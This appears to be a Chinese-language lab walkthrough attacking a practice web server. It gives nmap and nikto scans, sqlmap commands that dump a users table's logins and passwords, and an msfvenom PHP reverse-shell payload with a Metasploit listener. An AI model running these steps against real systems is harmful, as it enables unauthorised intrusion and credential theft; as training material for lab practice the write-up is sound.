信息探测
扫描主机服务信息以及服务版本
nmap -sV 192.168.101.50
快速扫描全部信息
nmap -T4 -A -v 192.168.101.50
扫描敏感信息
nikto -host http://192.168.101.50:80
深入挖掘
分析nmap、nikto扫描结果,并对结果进行分析
使用浏览器打开http://192.168.101.50:80
漏洞扫描
使用web漏洞扫描器owasp-zap(ZAP)
打开之后选择Automated Scan,然后输入目标ip开始进行攻击,等待GET信息返回完毕
然后查看是否可以进行sql注入
使用sqlmap利用sql注入漏洞
sudo sqlmap -u "http://192.168.101.50/cat.php?id=3" 查看id是否具有sql漏洞
sudo sqlmap -u "http://192.168.101.50/cat.php?id=3" -dbs 查看数据库名
sudo sqlmap -u "http://192.168.101.50/cat.php?id=3" -D "photoblog" --tables 查看对应数据库中的表
sudo sqlmap -u "http://192.168.101.50/cat.php?id=3" -D "photoblog" -T "users" --columns 查看对应字段
sudo sqlmap -u "http://192.168.101.50/cat.php?id=3" -D "photoblog" -T "users" -C 'login,password' --dump 查看对应字段的值
(也可以直接尝试sqlmap -u-url -os-shell直接获取shell)
得到用户名和密码后重新返回http://192.168.101.50:80使用用户名和密码登录
生成反弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.101.51 lport=4444 -f raw
gedit shellcd.php
(将生成的php代码拷贝到shellcd.php中)
上传shell反弹监听
打开msfconsole
msfconsole
启动监听模式
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.101.51
set lport 4444
run
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60